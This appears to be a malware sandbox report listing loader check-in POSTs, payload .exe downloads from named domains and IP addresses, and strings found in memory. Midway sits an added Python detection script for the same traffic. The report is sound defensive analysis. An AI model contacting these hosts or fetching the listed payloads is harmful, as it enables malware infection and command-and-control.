Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://jxgxnkpb.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 140 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://mfkcxcj.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 256 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://codldamrms.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 231 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://niaqngu.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 198 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://hmpbvq.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 193 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ktpvhvj.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 272 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ovfkbfuk.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 348 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://cgqgnij.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 197 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://pdjtd.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 169 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://jcppp.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 305 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://fnkfxr.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 359 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://crnelkeerw.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 116 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://lyxrabhsyj.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 162 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://dvrkmsgph.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 311 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://bdwjscwkyb.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 111 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://laegissbnw.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 314 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://pmulpwtk.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 152 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://vgfuhgdk.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 240 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://gjmsrnrg.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 312 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://hffekwpew.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 343 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://nrofkgudk.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 240 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ldeax.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 254 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://mvdnpk.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 217 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://uaeudvuct.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 208 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://tfmwuwhaf.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 180 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /l3.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 81.163.30.181
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://bjmmoxjkh.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 200 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://uekxwe.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 207 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /book/KB5009812.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 74.201.28.62
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ybthjouy.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 175 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://qycehx.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 137 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://udwhex.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 294 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://hriqvkh.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 155 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://rajclxd.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 247 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://rkgofw.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 260 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://cmhrt.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 248 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://rdctx.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 307 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://hqdkqcs.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 341 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: GET /l2.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 81.163.30.181
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://cfyeur.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 321 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://lwqbhm.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 325 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://podwtxiqj.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 259 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://kxheih.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 114 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ahptoxawd.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 125 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ruiwhjpxrd.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 253 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ukonhqmwew.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 268 | Host: host-data-coin-11.com
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://qmeixpxj.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 268 | Host: host-data-coin-11.com
Source: global traffic | TCP traffic: 192.168.2.4:49803 -> 185.7.214.171:8080
Source: global traffic | TCP traffic: 192.168.2.4:49892 -> 86.107.197.138:38133
Source: global traffic | TCP traffic: 192.168.2.4:49955 -> 74.201.28.62:5586
Source: global traffic | TCP traffic: 192.168.2.4:49828 -> 104.47.53.36:25
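Two patterns in the request list above are worth turning into detection logic: the check-ins are all POST / to host-data-coin-11.com with a form-urlencoded body of 111 to 361 bytes and a Referer naming a different, apparently random domain on every request, none of which is the Host itself; and the second-stage fetches are GETs for .exe paths, several of them from IP-literal hosts or a non-default port (185.7.214.171:8080). The script below is an added example, not code from the report: it rebuilds a handful of the listed requests as raw HTTP request text (the values are the report's, the framing is constructed), adds one constructed benign request as a control, and runs both rules over them. Assumptions: the threshold of three distinct Referer domains per Host is a starting point to tune against your proxy logs, and the IE11 User-Agent string is shared by legitimate WinINet clients, so it is carried as a pivot field rather than used as a rule.

```python
"""Detection logic for the request pattern listed above (added example, not
from the report; the sample requests reuse the report's values, the benign
control at the end is constructed)."""
import ipaddress
from collections import defaultdict
from urllib.parse import urlsplit

IE11_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"


def beacon(referer, length):
    """POST / with the header set the report shows; only Referer and length vary."""
    return ("POST / HTTP/1.1\r\nConnection: Keep-Alive\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\n"
            f"Referer: {referer}\r\nUser-Agent: {IE11_UA}\r\n"
            f"Content-Length: {length}\r\nHost: host-data-coin-11.com\r\n\r\n")


def download(path, host):
    return (f"GET {path} HTTP/1.1\r\nConnection: Keep-Alive\r\n"
            f"User-Agent: {IE11_UA}\r\nHost: {host}\r\n\r\n")


SAMPLE_REQUESTS = [
    beacon("http://pieilmtu.com/", 280), beacon("http://nwilglig.org/", 282),
    download("/files/9030_1641816409_7037.exe", "data-host-coin-8.com"),
    beacon("http://nfbqltka.com/", 251), beacon("http://cvdhldsf.net/", 201),
    download("/install5.exe", "unicupload.top"),
    download("/6.php", "185.7.214.171:8080"),
    beacon("http://qcjatd.com/", 351),
    download("/l3.exe", "81.163.30.181"),
    download("/book/KB5009812.exe", "74.201.28.62"),
    # constructed control: ordinary same-site browsing, must not fire
    "GET /index.html HTTP/1.1\r\nHost: example.com\r\nReferer: https://example.com/\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/97.0\r\n\r\n",
]


def parse_request(raw):
    """Split raw request text into method, path and a lower-cased header dict."""
    head = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    method, path, _version = head[0].split(" ", 2)
    headers = {}
    for line in head[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def host_name(headers):
    return headers.get("host", "").split(":")[0].lower()


def find_beacon_hosts(reqs, min_distinct=3):
    """Loader-style check-in: repeated POST / to one Host, each request carrying a
    Referer from a different domain that is never the Host itself. Browsers rarely
    produce that shape; a loader does it on every beacon."""
    referers = defaultdict(set)
    for r in reqs:
        if r["method"] != "POST" or r["path"] != "/":
            continue
        ref_host = urlsplit(r["headers"].get("referer", "")).hostname
        if ref_host and ref_host != host_name(r["headers"]):
            referers[host_name(r["headers"])].add(ref_host)
    return {h: sorted(v) for h, v in referers.items() if len(v) >= min_distinct}


def find_payload_downloads(reqs):
    """GETs that look like second-stage fetches: .exe paths, IP-literal hosts,
    non-default ports. Returns (host, path, reasons) for each request that hits."""
    hits = []
    for r in reqs:
        if r["method"] != "GET":
            continue
        host = r["headers"].get("host", "")
        name, _, port = host.partition(":")
        reasons = []
        if r["path"].lower().endswith(".exe"):
            reasons.append("exe path")
        try:
            ipaddress.ip_address(name)
            reasons.append("IP-literal host")
        except ValueError:
            pass
        if port and port not in ("80", "443"):
            reasons.append("non-default port " + port)
        if reasons:
            hits.append((host, r["path"], reasons))
    return hits


if __name__ == "__main__":
    parsed = [parse_request(x) for x in SAMPLE_REQUESTS]
    print(find_beacon_hosts(parsed))
    for hit in find_payload_downloads(parsed):
        print(hit)
```

On the sample set the first rule returns host-data-coin-11.com with its five Referer domains and the second returns the five fetches in order, with 185.7.214.171:8080 flagged for the IP literal and the port rather than the path; the example.com control matches neither. In production, feed `parse_request` from a proxy or NSM export instead of the inline list and raise `min_distinct` until the Referer rule stops firing on legitimate form posts.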
Source: WerFault.exe, 00000010.00000002.806997904.0000000004960000.00000004.00000001.sdmp, svchost.exe, 00000018.00000002.819352356.000002A079500000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 00000018.00000002.819053495.000002A078CEE000.00000004.00000001.sdmp | String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000018.00000003.793604569.000002A07957B000.00000004.00000001.sdmp | String found in binary or memory: http://help.disneyplus.com.
Source: 3D34.exe, 00000012.00000002.833275323.00000000041F1000.00000004.00000001.sdmp, 3D34.exe, 00000012.00000002.833464312.0000000004361000.00000004.00000001.sdmp | String found in binary or memory: https://api.ip.sb/ip
Source: svchost.exe, 00000018.00000003.793604569.000002A07957B000.00000004.00000001.sdmp | String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 00000018.00000003.793604569.000002A07957B000.00000004.00000001.sdmp | String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 00000018.00000003.793604569.000002A07957B000.00000004.00000001.sdmp | String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 00000018.00000003.794998457.000002A0795CA000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.795071055.000002A0795B3000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.795037619.000002A079592000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.795102955.000002A079A02000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.794951368.000002A0795CA000.00000004.00000001.sdmp | String found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: unknown | DNS traffic detected: queries for: host-data-coin-11.com
Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: 15_2_00404BE0 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,InternetConnectA,HttpOpenRequestA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,HttpQueryInfoA,StrCmpCA,Sleep,InternetReadFile,lstrcat,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
Source: global traffic | HTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /install5.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: unicupload.top
Source: global traffic | HTTP traffic detected: GET /game.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /6.php HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 185.7.214.171:8080
Source: global traffic | HTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /l3.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 81.163.30.181
Source: global traffic | HTTP traffic detected: GET /book/KB5009812.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 74.201.28.62
Source: global traffic | HTTP traffic detected: GET /book/KB5009812.png HTTP/1.1 | Host: 74.201.28.62 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /capibar HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: text/plain; charset=UTF-8 | Host: 185.163.204.22
Source: global traffic | HTTP traffic detected: GET //l/f/RGwRWn4BZ2GIX1a3oIgO/6bf5d5b41363c3e6b44705458de7ee6f935456db HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: 185.163.204.24
Source: global traffic | HTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: GET /l2.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 81.163.30.181
Source: global traffic | HTTP traffic detected: GET //l/f/RGwRWn4BZ2GIX1a3oIgO/7e7a36a98c7545dda4f314e30bbcbe9a8ba64652 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: 185.163.204.24
Source: unknown | Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown | Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49937 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown | Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown | Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown | Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49923
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49789
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f5 1e b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
